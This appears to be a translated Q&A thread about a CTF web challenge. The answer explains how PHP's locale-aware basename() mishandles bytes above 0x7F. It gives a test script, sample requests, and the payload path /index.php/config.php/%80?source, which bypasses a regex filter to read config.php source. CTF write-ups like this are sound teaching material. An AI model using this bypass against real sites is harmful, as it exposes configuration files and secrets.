我正在应对 CTF 的挑战。这是挑战的链接:Link1
当我尝试将路径更改为Link2时。
它成功检索了标志,但是当十六进制值小于 80 时,它不起作用。
我是一个初学者,做了很多挖掘来找出方法,但我找不到任何东西。请问怎么会这样?
问问题
177 次
1 回答
1
似乎挑战在于利用 PHPbasename()函数的一个怪癖。根据文档:
注意:
basename()是区域设置感知的,因此要使用多字节字符路径查看正确的基本名称,必须使用该setlocale()函数设置匹配的区域设置。
这意味着如果你传递一个包含高于 0x7F 的代码点的字符串,那么它会尝试将它们作为多字节字符处理。因此,将随机字节传递给此函数很可能会使其失败。
我将以下脚本上传到服务器进行测试:
<?php
header("Content-Type: text/plain; charset=UTF-8");
echo '$_SERVER["PATH_INFO"] = ';
var_dump($_SERVER['PATH_INFO']);
echo '$_SERVER["PHP_SELF"] = ';
var_dump($_SERVER['PHP_SELF']);
echo 'basename($_SERVER["PHP_SELF"]) = ';
var_dump(basename($_SERVER['PHP_SELF']));
以下是我通过一些选择的请求获得的结果:
■GET /index.php?source
$_SERVER["PATH_INFO"] = NULL
$_SERVER["PHP_SELF"] = string(15) "/index.php"
basename($_SERVER["PHP_SELF"]) = string(9) "index.php"
■GET /index.php/config.php?source
$_SERVER["PATH_INFO"] = string(11) "/config.php"
$_SERVER["PHP_SELF"] = string(26) "/index.php/config.php"
basename($_SERVER["PHP_SELF"]) = string(10) "config.php"
■GET /index.php/config.php/XXX?source
$_SERVER["PATH_INFO"] = string(15) "/config.php/XXX"
$_SERVER["PHP_SELF"] = string(30) "/index.php/config.php/XXX"
basename($_SERVER["PHP_SELF"]) = string(3) "XXX"
■GET /index.php/config.php/%F0%9F%98%80?source
$_SERVER["PATH_INFO"] = string(16) "/config.php/"
$_SERVER["PHP_SELF"] = string(31) "/index.php/config.php/"
basename($_SERVER["PHP_SELF"]) = string(10) "config.php"
您会注意到,在最后一个示例中,PHP 未能解析字符串末尾的 UTF-8 字符,而是PATH_INFO默认为前面的值 of 。config.php
因此,在您给出的示例中,指向的链接/index.php/config.php/%80?source将导致$_SERVER["PHP_SELF"]取值为"config.php". 这允许您的查询通过以下测试,因为$_SERVER['PHP_SELF']以\x80, not结尾/:
if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
exit("I don't know what you are thinking, but I won't let you read it :)");
}
因此,您可以从config.php.
一个有趣的挑战。
注意:如果您将 PHP 的语言环境设置为接受 UTF-8 字符(例如setlocale(LC_ALL, 'en_GB.UTF8');)的内容,那么它将正确处理这些字符,但在给定无效代码点(如%80.
于 2020-03-09T11:47:23.460 回答